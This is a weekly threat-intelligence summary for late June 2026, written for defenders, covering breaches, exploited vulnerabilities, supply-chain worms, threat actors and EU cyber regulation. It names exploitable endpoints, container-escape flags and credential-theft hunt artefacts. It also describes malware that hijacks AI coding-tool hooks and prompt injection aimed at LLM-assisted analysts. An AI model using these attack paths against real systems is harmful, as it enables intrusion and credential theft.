CTI Weekly Summary — 2026-W26 (Jun 22 – Jun 28, 2026)

NAIC breached through an Oracle PeopleSoft zero-day; ShinyHunters dumps 3.1 TB and US rating-agency feeds stall

If you did nothing this week: any internet-reachable Oracle PeopleSoft instance is a live pre-auth foothold — the same zero-day path that put the US National Association of Insurance Commissioners into ShinyHunters' hands, and PeopleSoft is widely deployed across European public administration, higher education and HR/finance back offices. The W25 looking-ahead flagged that ShinyHunters PeopleSoft notifications were still landing and that EU universities were a probable next-named class; NAIC is the fresh high-profile confirmation that the campaign is still acquiring victims.

NAIC — the standard-setting body for all 50 US state insurance regulators — confirmed on 2026-06-26 that an unauthorised party reached its environment on June 11 via an Oracle PeopleSoft vulnerability, then pivoted from PeopleSoft to temporary access to data-storage areas. ShinyHunters claims 3.1 TB exfiltrated (TechRadar, Insurance Journal). The operational tell is the downstream impact NAIC itself disclosed: credit-rating agencies paused their data feeds and NAIC suspended assigning designations to insurer investments — a regulatory-process outage, not just a data-confidentiality event. This is the same PeopleSoft exploitation wave (CVE-2026-35273, the unauthenticated RCE in PeopleTools Environment Management) Google GTIG attributes to UNC6240/ShinyHunters and has been tracking against the education sector — 68% of identified targets were higher-education institutions; see § 8 for the campaign-level status. Treat any externally-reachable PeopleSoft portal (/PSEMHUB/, /PSIGW/HttpListeningConnector) as a hunt target, not a patch-later item. (daily 06-28)

ShapedPlugin's official update channel shipped backdoored WordPress Pro plugins — credential, 2FA-secret and web-shell theft

If you did nothing this week: any site running the ShapedPlugin Pro plugins that auto-updated through the licensed channel pulled backdoor code straight from the vendor — patch level was no defence, because the trusted distribution pipeline itself was the attacker. The malicious LicenseLoader.php loads inside the WordPress admin panel, fetches a second stage, installs it as a fake plugin and self-deletes to frustrate forensics.

Wordfence disclosed on 2026-06-22 that an attacker breached ShapedPlugin's build and Easy Digital Downloads distribution pipeline and injected backdoor code into the Pro (paid) releases of three plugins, served through official update channels. The implant harvests credentials and 2FA secrets and drops a web shell (BleepingComputer). For a public-sector or education estate that runs WordPress behind a CMS team, the hunt is for the fake-plugin artefact and unexpected LicenseLoader.php execution in the admin context, plus credential/2FA rotation for any admin who logged in during the exposure window — not merely "update the plugin." (daily 06-23)

Klue / Icarus Salesforce OAuth-integration breach — from nine named victims to ~24, then the attacker gets hacked

This is the W25 multi-day item, but the in-window deltas re-shape it materially. At the start of the week the named-victim list stood at nine, mostly cybersecurity vendors (HackerOne, Huntress, Jamf, OneTrust and others, SecurityWeek 06-23). It then accreted through the week: 8x8 filed an SEC 8-K Item 1.05 on 06-23 confirming Salesforce exfiltration; BeyondTrust and LastPass disclosed business-contact and sales data theft on 06-25; by 06-27 roughly two dozen firms had notified, and in a twist the Icarus attacker was itself hacked, with a second extortion actor now threatening the stolen data. Salesforce disabled the Klue connected app.

The new lens the dailies could not assemble: this is a single dormant OAuth integration credential at one SaaS vendor cascading into multi-tenant CRM theft across that vendor's entire customer base — the exact failure mode ReliaQuest framed as "integration abused in CRM data theft" in W25. For a Swiss/EU SOC the takeaway is an OAuth-grant inventory exercise: enumerate third-party connected apps with API scopes into your CRM/identity tenants, revoke dormant grants, and alert on bulk REST/Bulk-API reads from integration principals — patching nothing here helps, because no software was vulnerable; a delegated token was. (daily 06-23, daily 06-25, daily 06-27)

ShinyHunters (UNC6240) — one cluster, multiple reported tradecraft paths in one week

The week is a compact case study in how a single extortion cluster's reported activity spans very different initial-access tradecraft. The two firmly UNC6240-attributed events are the Oracle PeopleSoft zero-day behind the NAIC breach (GTIG/Mandiant attribution, § 1) and the April 2026 Instructure Canvas LMS breach, whose UK Cyber Monitoring Centre sector review landed 06-27 (160 UK universities, extortion, ransom paid). Alongside them, 404 Media's reconstruction (06-26) showed the Madison Square Garden intrusion began with a single vishing call into the company's identity platform — the operator phoned a low-level employee and talked them through authorising access; the 404 Media account documents the technique but names no actor, and the ShinyHunters link rests on the operators' own claims and the SSO-vishing TTP overlap Abnormal Security attributes to the cluster.

The cross-day pattern matters more than any single victim: a server-side zero-day, a SaaS-platform compromise and SSO-targeting vishing all appear under (or adjacent to) one extortion banner in one week, so defending against this cluster is not a single control. It is externally-reachable enterprise-app patching/hunting, third-party SaaS exposure management, and help-desk/identity-platform vishing resistance (callback verification, no MFA-reset-on-call) — all at once. (daily 06-26, daily 06-27, daily 06-28)

npm supply-chain worms — a sustained wave across the week

Three separate npm-ecosystem supply-chain events were in play across the window, and the pattern is the story. Microsoft attributed the Mastra scope compromise (140+ @mastra packages, postinstall dropper) to North Korea's Sapphire Sleet (covered in the daily on 06-21). JFrog documented PostCSS typosquats from the abdrizak account delivering a Nuitka-compiled Python RAT with Chrome DPAPI credential theft. And on 2026-06-25 Socket reported a fresh Miasma / "Mini Shai-Hulud" worm wave across LeoPlatform/RStreams packages (carried in the daily 06-27), the self-propagating supply-chain worm last seen backdooring @redhat-cloud-services.

The synthesis: the npm registry is under continuous, parallel pressure from a state actor (DPRK), commodity typosquat crews and a self-replicating worm — three different operators, one ecosystem. The common control is the same one npm v12 is about to enforce by default: disable install scripts (--ignore-scripts), pin and review dependencies, and treat CI build-time package resolution as an attack surface. (daily 06-21, daily 06-24, daily 06-27)

CVE-2026-12569 — PTC Windchill / FlexPLM: pre-auth deserialization RCE, now confirmed exploited with JSP web shells (CISA KEV)

When first covered (06-20) and in the W25 weekly this was a pre-auth deserialization flaw with BSI escalating to admins out-of-hours. The in-window delta: CISA added it to KEV on 06-25 and JSP web-shell deployment against the login interface is now confirmed in the wild. Any internet-reachable Windchill PDMLink or FlexPLM instance should be treated as assume-compromise — manufacturing and defence-supplier PLM is exactly the externally-reachable engineering surface a Swiss/EU industrial estate forgets to inventory.

CVE-2026-20245 — Cisco Catalyst SD-WAN Manager: Mandiant reconstructs the full zero-day chain

Mandiant (GTIG) published the first complete TTP chain on 06-24 for the Catalyst SD-WAN Manager zero-day activity, observed at a service provider: a peering/authentication bypass (CVE-2026-20127, CVE-2026-20182) leading to credential manipulation, then local privilege escalation to root via a malicious CSV upload (CVE-2026-20245) to plant a root backdoor. NCSC-CH posted on it, giving it direct Swiss relevance. Telco and public-sector SD-WAN operators should hunt for unexpected file writes under the web-UI service account and root-owned artefacts post-dating the patch.

CVE-2025-67038 — Lantronix EDS5000 serial-to-IP converters: unauthenticated command injection to root (BRIDGE:BREAK, CISA KEV)

Forescout Vedere Labs' BRIDGE:BREAK research documented an unauthenticated OS command-injection flaw in Lantronix EDS5000-series device servers — the HTTP management interface concatenates unsanitised input into a shell call. The in-window development is its CISA KEV listing on 2026-06-23 with confirmed in-the-wild exploitation (covered in daily 06-24) — the first BRIDGE:BREAK flaw to flip from research to active abuse. Serial-to-IP converters sit in front of OT, building-management and medical serial devices; firmware 2.0.0R1 closes it. This is an energy/water/healthcare exposure, not an IT one.

CVE-2026-34908 / CVE-2026-34909 / CVE-2026-34910 — Ubiquiti UniFi OS Server: pre-auth RCE chain, exploited (CISA KEV)

Three max-severity (CVSS 10.0) flaws in UniFi OS Server — improper access control and path traversal that bypass authentication and reach an unauthenticated RCE endpoint — were patched and KEV-listed with confirmed exploitation. UniFi controllers are common in DACH SME, education and public-sector branch networks; the management plane is frequently exposed. Patch and audit controller-account integrity.

CVE-2026-20230 — Cisco Unified CM WebDialer: pre-auth SSRF to arbitrary root file write, reconnaissance-stage scanning observed

Cisco PSIRT's advisory describes an SSRF in the WebDialer service of Unified CM 14/15 that lets an unauthenticated attacker write files to the OS and later escalate to root. The in-window signal: exploitation moved to reconnaissance stage, with a PoC that fingerprints vulnerable devices. Unified CM is core telephony for many cantonal and hospital networks — patch before the scanning becomes exploitation.

CVE-2026-43503 (DirtyClone) and CVE-2026-46331 (pedit COW) — Linux kernel LPE with public weaponised PoCs

Two page-cache-corruption local-privilege-escalation flaws drew working exploits within the window. JFrog published a full DirtyClone walkthrough (XFRM/IPsec skb cloning) on 06-25; a companion tc act_pedit out-of-bounds write (pedit COW) gained a weaponised PoC within a day of assignment. Both are post-auth root escalation on patched-but-unrebooted hosts — prioritise kernel updates on multi-tenant and internet-exposed Linux where an initial foothold is plausible.

CVE-2026-58053 — Gitea `act_runner` Docker backend: container-hardening bypass to host escape (public PoC, ENISA-critical)

Gitea act_runner through 0.262.0 passes a workflow-defined container.options string straight into Docker's HostConfig, forcing only Privileged=false while merging --pid=host, --cap-add and --security-opt unchanged — a malicious workflow escapes the job container to the host (VulnCheck). Public PoC, CVSS 9.4, mitigation-only this week. Self-hosted Gitea CI is common in DACH developer shops and universities; restrict who can define workflow container options. The companion Gitea-core auth bypass via X-WEBAUTH-USER (CVE-2026-20896, fixed in 1.26.3/1.26.4) remains worth patching on the same estate.

CVE-2026-11800 (JWT algorithm-confusion) and CVE-2026-9800 (policy-enforcer authz bypass) — Keycloak identity-plane fixes

Keycloak 26.6.4 fixed eight CVEs. The headline flaw is CVE-2026-11800, a JWT algorithm-confusion that lets an attacker with valid client credentials forge an assertion, bypass signature verification and impersonate any federated user behind the affected identity provider (GHSA-gqj5-2xp5-3qmp, BSI WID-SEC-2026-2093); the bundled CVE-2026-9800 is a separate policy-enforcer authorization bypass via incorrect URI comparison. Keycloak is the IdP of choice across European public-sector, healthcare and finance deployments — these are identity-plane breaks, not app bugs. Patch to 26.6.4.

CVE-2026-55200 / CVE-2026-55199 — libssh2 heap out-of-bounds write with public PoC

The GitHub Security Advisory GHSA-r8mh-x5qv-7gg2 describes a heap out-of-bounds write in libssh2's ssh2_transport_read() that fails to enforce an upper bound on the packet_length field (CVSS 9.2), with a companion pre-auth DoS (CVE-2026-55199) corroborated by NCSC-NL NCSC-2026-0210; public PoC code was reported within the window (see daily 06-28). An upstream fix has landed (the GHSA references the fix commit), but tagged-release availability still varies across the binding and appliance ecosystem — so the operational task is SBOM exposure tracking and chasing each embedding vendor's release, not a single library bump (see § 11 caveat). libssh2 is embedded in a long tail of management tooling, appliances and language bindings.

Public administration & government

The week's public-sector signal is heavily Swiss/European. NCSC-CH reported an active Microsoft 365 "voicemail" phishing wave in Switzerland delivering infostealers and harvesting M365 credentials, with chain-phishing onward from compromised mailboxes. The Swiss Federal Audit Office reported that the two-year-old split of federal cyber-governance leaves strategic oversight without a complete incident picture — a structural finding for any federated public administration. Further afield, Ukraine's postal operator Ukrposhta had digital services disrupted by an overnight attack, and Brazil's national Cell Broadcast alert platform was hijacked to push fake emergency messages to ~30M phones — a reminder that government alerting infrastructure is itself a target.

Healthcare

Third-party processors drove the week's healthcare exposure. Xsolis, a healthcare-AI utilization-management vendor, disclosed a phishing-driven breach affecting 1,396,519 patients across seven US health systems — the data sat at the processor, not the hospitals. The UK's HCRG Care Group began notifying patients of a February 2025 Medusa ransomware attack — a 16-month notification lag. The Lantronix BRIDGE:BREAK flaw (§ 3) additionally exposes serial-attached medical devices.

Education

Education was a structural victim class. The ShinyHunters Canvas/Instructure breach hit 160 UK universities per the UK CMC sector review (ransom paid, limited downstream damage). The unpatched ILIAS 11.0 SQL-injection (CVE-2026-12789, PoC-public, no patch) directly exposes the DACH learning-management estate, and self-hosted Gitea CI (§ 3) is concentrated in universities. The common thread: education runs exposed CMS/LMS/forum and developer stacks with thin operational security.

Technology & SaaS supply chain — the week's busiest victim class

The dominant pattern of the week was the third party as entry vector: Klue/Icarus (Salesforce OAuth, ~24 firms), ShapedPlugin (WordPress build pipeline), the npm worm wave, 8x8's SEC-disclosed Salesforce theft, and the BadBlocker Chrome extension (§ 6). In nearly every case the victim organisation patched nothing wrong of its own — the compromise rode in through a trusted vendor, integration token, package or browser extension.

Social engineering and SSO abuse opened the highest-profile intrusions

Madison Square Garden was breached by a single vishing call into its identity platform; the operators talked a low-level employee into authorising access. This is the same human-layer entry that has driven the year's most damaging extortion. The defensive lesson is process, not product: callback verification on help-desk identity changes, no MFA reset on an inbound call, and alerting on anomalous SSO grants from new devices.

Mass third-party exposures: Xsolis, Texas Parks & Wildlife, Canvas

Three large data exposures all traced to a third party rather than the named organisation: Xsolis (1.4M patients via a healthcare-AI processor), Texas Parks & Wildlife (3.08M licence holders via an unnamed licence-sales vendor, with a public-vs-AG-filing SSN contradiction noted in § 11), and the Canvas/Instructure LMS breach (160 UK universities). The recurring control gap is vendor data-minimisation and breach-notification SLAs.

Attribution and accountability: Jaguar Land Rover and Scattered Spider

Two disclosures closed loops opened months ago. A New York Times investigation gave the first named attribution for the 2025 Jaguar Land Rover ransomware attack — a Russian state-linked criminal group — though investigators have not determined whether the operators worked for, independently of, or with the tacit approval of the Russian government. And two Scattered Spider members pleaded guilty over the 2024 Transport for London intrusion. Both reinforce that the dominant English-speaking extortion ecosystems are being mapped to named individuals and state-linked clusters.

Research: the trust chain, not the perimeter, was the week's attack surface

The week's research converges on one structural shift: the productive attack surface in 2026 is the set of trust relationships connecting developer tools, CI/CD pipelines, SaaS integrations, AI coding agents and the browser — not the network perimeter. Tenable's analysis of the Miasma worm frames it as a "Developer Credential Economy": an infostealer harvests a developer credential (a Red Hat GitHub token sat in infostealer logs ~7 weeks before weaponisation), it is brokered underground, then weaponised through npm and — the novel capability — injected into the SessionStart hooks of AI coding tools so it runs when a developer opens a repo (Socket enumerates at least five affected tools — Claude Code, GitHub Copilot, Gemini CLI, Cursor, VS Code). The entire kill chain carries no CVE, and SLSA provenance attestations passed registry checks — provenance without content scanning is no defence (Socket).

The same trust-boundary theme runs through the week's other primary research: the Klue/Icarus cascade (a 2022 OAuth grant, § 2); Cordyceps, which found 300+ exploitable pull_request_target GitHub Actions misconfigurations leaking main-branch secrets (Novee Security); Unit 42's malicious-skill payloads bypassing the OpenClaw agent sandbox (Unit 42); and Island's "BadBlocker", an 11M-install Chrome ad-blocker one server-side config change away from arbitrary JavaScript on any site, with no extension update or store review (Island). On the identity plane, Netcraft documented Bluekit, a Browser-in-the-Middle phishing-as-a-service platform that authenticates the victim into the attacker's browser session, defeating Device Bound Session Credentials (Netcraft) — a reminder that session-binding controls like DBSC do not stop a browser-in-the-middle relaying the live authenticated session. Cisco Talos's field guide to Windows COM abuse (ITaskService, BITS, WMI, DCOM as EDR-evasion primitives) closes the loop on detection: indirect vtable calls hide activity behind legitimate service call stacks. The defender takeaway is uniform — audit OAuth grants and integration service accounts older than 12 months, restrict AI-agent hook configuration to read-only paths, treat CI/CD token scope as a reviewed principal, and don't assume FIDO2 closes the phishing path.

Threat-actor developments: Russia-nexus espionage broadens; new China-nexus and DPRK clusters

The most significant new actor finding the dailies did not carry is Turla's STOCKSTAY — Google GTIG characterised a multi-component .NET/Windows Forms backdoor that communicates C2 over secure WebSocket and shares significant code overlap with Kazuar (Turla's staple implant since 2017). Delivery used malicious RDP files by phishing and, as recently as November 2025, RAR archives exploiting WinRAR's CVE-2025-8088 (a flaw also abused by Sandworm, Gamaredon and RomCom). Current targeting is Ukrainian government and military, but earlier victims had Italian, Dutch, Polish and German foreign-policy interest — a direct read-across for Swiss federal and European governmental entities with Ukraine-adjacent policy work (The Hacker News). This sits alongside the week's other Russia-nexus signal: FBI/CISA escalated their warning that Russian intelligence (tracked as UNC5792) is now phishing Signal Backup Recovery Keys for persistent account takeover, and ESET's Gamaredon retrospective (§ 7) shows the FSB-linked group moving exfil and C2 wholesale onto trusted cloud services.

Two non-Russian clusters round out the picture. Unit 42 documented CL-STA-1062, a Chinese-speaking cluster (overlapping Talos's UAT-7237) deploying the new TinyRCT .NET backdoor via AppDomainManager injection against Southeast-Asian government and state-owned energy targets (Unit 42); Kaspersky GReAT analysed the StrikeShark cluster's SharkLoader deploying Cobalt Strike via "Perfect DLL Hijacking" against government targets (Securelist). And SentinelLABS' macOS.Gaslight, a DPRK-aligned Rust backdoor, notably turns prompt injection on the LLM-assisted analyst rather than the sandbox (SentinelLABS) — an early instance of tradecraft built specifically to poison AI-assisted triage. Attribute the claim to the research outfit, not the state, where the source itself hedges.

Swiss Post Cybersecurity — inaugural Swiss Threat Landscape Report `[SINGLE-SOURCE]`

Swiss Post Cybersecurity published its first Swiss Threat Landscape Report at its Hack'Events conference (06-23), drawing on its own SOC, IR and offensive-security practice. For a Swiss public-sector SOC this is the most locally-grounded threat baseline of the week; the synthesis worth carrying beyond the daily's recap is that the report's emphasis on phishing, identity compromise and AI-abuse maps precisely onto the week's operational signal — the NCSC-CH M365 voicemail-phishing wave (§ 4), the Bluekit BitM and Klue OAuth identity attacks (§§ 2, 6), and AI-agent supply-chain abuse (§ 6). The local-vendor view and the week's incidents agree on where Swiss defenders should spend marginal effort: identity and the human layer, not perimeter CVEs alone.

ESET "Killing me gently" — a de-facto mid-year RaaS-tooling report

Background. The Gentlemen emerged in late 2025 as a RaaS operation founded by "hastalamuerte" (a former Qilin affiliate per Group-IB, previously affiliated with Embargo, LockBit, Medusa and BlackLock per PRODAFT). ESET first hypothesised an in-house EDR-killer in February 2026; Group-IB and Check Point independently corroborated before the gang's own internal data leaked. By April 2026 the group accounted for ~10% of global ransomware activity, and Krebs (06-10) linked the alias to a named individual in Izhevsk, Russia.

ESET's 06-26 deep-dive into the leaked internal data is the most substantive published-in-window documentation of RaaS tooling structure, and reads as a mid-year complement to the W25 Check Point State of Ransomware Q1 2026. Three structural findings a detection engineer should register: (1) GentleKiller is a modular in-house framework with at least eight BYOVD variants, each impersonating a different vendor and abusing a different kernel driver — driver allow-listing alone is insufficient without process-injection-chain detection; (2) the group integrates rival gangs' EDR killers (HexKiller from Warlock, ThrottleBlood shared with MedusaLocker/DragonForce, HavocKiller), so tooling overlap no longer implies operational overlap; (3) victims are selected centrally on FortiGate misconfiguration rather than geography, tying the Gentlemen victim pipeline directly to FortiBleed-style reconnaissance (§ 8). New BYOVD PoCs are operationalised within days of public release. (daily 06-27)

ESET Gamaredon 2025 — annual actor retrospective

Background. Gamaredon (FSB-linked, Russia-nexus) has been ESET's most-tracked Ukraine-focused operator for years; its prior annual papers documented a high-tempo, PowerShell-heavy toolset and aggressive infrastructure churn.

ESET's 2025 Gamaredon paper (covered 06-26) documents six new PowerShell tools and the wholesale migration of exfiltration and C2 onto trusted cloud services, tunnels and "workers" — the horizon implication for European public-sector defenders is detection-oriented: Gamaredon-class C2 increasingly hides inside legitimate cloud-service traffic (Cloudflare workers, Telegram, dead-drop resolvers), so network-indicator blocking degrades and behavioural detection on the endpoint and on anomalous cloud-service egress becomes the durable control.

FortiBleed (`key: fortibleed`)

The W25 top story continued without a scale revision — the device count holds at the 86,644 figure the dailies reported — but the in-window development is the clearest state-interest signal yet: CISA updated its hardening alert on 06-22 to link Fortinet's revised guidance, and reporting now confirms that on in mid-June the Russian-speaking operator completed offline Kerberos-hash cracking from captured FortiGate configs and immediately exfiltrated DFS backup data from a NATO-aligned defence contractor — a full AD domain takeover (Security Affairs). Outstanding for defenders: treat any FortiGate admin/VPN credential active May–June 2026 as compromised, rotate, then hunt AD for pass-the-hash, DCSync and DFS-backup exfiltration (Kerberos ticket anomalies, LSASS access, ntdsutil/impacket artefacts). Patch level is irrelevant — this is credential reuse, not a new CVE.

ShinyHunters / UNC6240 Oracle PeopleSoft campaign (`key: shinyhunters-peoplesoft`)

The campaign behind the § 1 NAIC breach. GTIG/Mandiant attributes to UNC6240 an active zero-day exploitation of Oracle PeopleSoft (CVE-2026-35273) between May 27 and June 9, predating Oracle's advisory; staging environments deployed customised MeshCentral agents masquerading as cloud endpoints, then ran a per-victim [victim]_fanout.sh lateral-movement-and-defacement script (Google GTIG). ~300 PeopleSoft instances compromised, ~100 organisations notified, 68% higher education, with the University of Nottingham among the first named public victims (SecurityWeek). The status this week: NAIC confirmed (§ 1), and notifications are still landing, so more European education and public-finance victims are likely. The weekly lens: this is ShinyHunters operating as a zero-day-capable ERP attacker — a capability shift from the brand's 2021–2024 credential-stuffing persona. Outstanding question: which EU universities running PeopleSoft are in the un-notified tail.

The Gentlemen (`key: the-gentlemen`)

The W25 multi-day item now has primary-evidence depth (the ESET deep-dive, § 7) and a sharp Swiss angle: Check Point data, reported by Swiss tech press, makes Switzerland the second-most-targeted European country for the operation, which now claims 478 victims and has added worm propagation. The operationally important link is that victim selection runs on FortiGate misconfiguration scanning — so a Swiss organisation's FortiBleed exposure (above) is also its Gentlemen-victim-selection exposure. Outstanding for defenders: the same FortiGate hardening that closes FortiBleed reduces Gentlemen targeting, and EDR-tamper-protection plus driver-blocklist enforcement is the GentleKiller counter.

Operation Endgame (`key: operation-endgame`)

Europol's law-enforcement campaign extended its reach this week: the 06-24/25 Amadey and StealC takedown actioned 326 servers and 142 domains and recovered approximately 27 million stolen credentials from over 385,000 compromised systems (BleepingComputer), with Microsoft providing the Amadey/StealC infrastructure analysis (Microsoft). Combined with the W25 SocGholish/TA569 seizure (106 servers), Endgame has now dismantled three commodity delivery-and-theft networks in quick succession. The defender gap: no arrests were announced for this phase, so infrastructure can reconstitute — cross-reference the recovered 27M credentials against your identity-store canaries and hunt Amadey persistence (HKCU run-key, rundll32/regsvr32 side-loads, short-lived child processes under %AppData%\Roaming).

Netherlands NIS2 (Cyberbeveiligingswet) clears the lower house — entry into force targeted for 1 July 2026

The Dutch transposition is in its final step: the Tweede Kamer (lower house) approved the Cyberbeveiligingswet on 15 April 2026 (Rijksoverheid), with the Eerste Kamer (upper-house) ratification vote still pending in late June and the government targeting 1 July 2026 for entry into force. NCSC-NL is the designated supervisor; the regime runs a three-step 24h / 72h / one-month incident-notification protocol, essential-entity penalties up to €10M or 2% of turnover, and personal board liability for security-measure oversight (NL Digital Government). This is the fresh delta on the W25 NIS2-transposition item, which listed the Netherlands as pending; France, Ireland, Luxembourg and Spain remain non-transposed. What changes for defenders: any essential/important entity with Dutch operations or Dutch counterparties is about to face an enforceable notification clock and a named supervisor — wire NCSC-NL's 24/72-hour flow into the incident-response runbook now, and re-check which group entities fall in scope.

EU Commission proposes a major Europol / Eurojust mandate expansion

On 24 June the Commission tabled COM(2026) 580 proposing to expand Europol and Eurojust: automated, near-real-time national-police-to-Europol data upload via a new "Police Shared Data Space" cloud, Europol Support Offices embedded in Member-State agencies, an explicit Eurojust cybercrime mandate, and a roughly doubled (~€3bn) budget, with cybercrime and AI-accelerated threats cited as primary drivers (European Commission). The Protect Not Surveil coalition warns of systematic data ingestion without categorisation safeguards. This is co-decision and unlikely to bind before 2027+, but public-sector CISOs in EU Member States should track it now: it reshapes how incident and victim data may flow to Europol, with data-protection and onward-sharing implications for breach reporting.

EU Cyber Resilience Act — 75 days to the 11 September vulnerability/incident-reporting obligation

CRA Article 28 (conformity-body notification) entered force on 11 June 2026; the next binding milestone — mandatory vulnerability/incident reporting by manufacturers to ENISA's Single Reporting Platform — activates 11 September 2026, now ~75 days out (ENISA SRP). ENISA has not yet published a dry-run schedule, stating guidance is due June–August (Crowell & Moring). For Swiss readers the practical action is procurement-side: Swiss manufacturers selling digital products into the EU fall in scope, and Swiss public-sector procurement teams should add CRA compliance attestations to vendor specs and confirm in-scope suppliers can meet the 24/72-hour SRP reporting flow before it binds.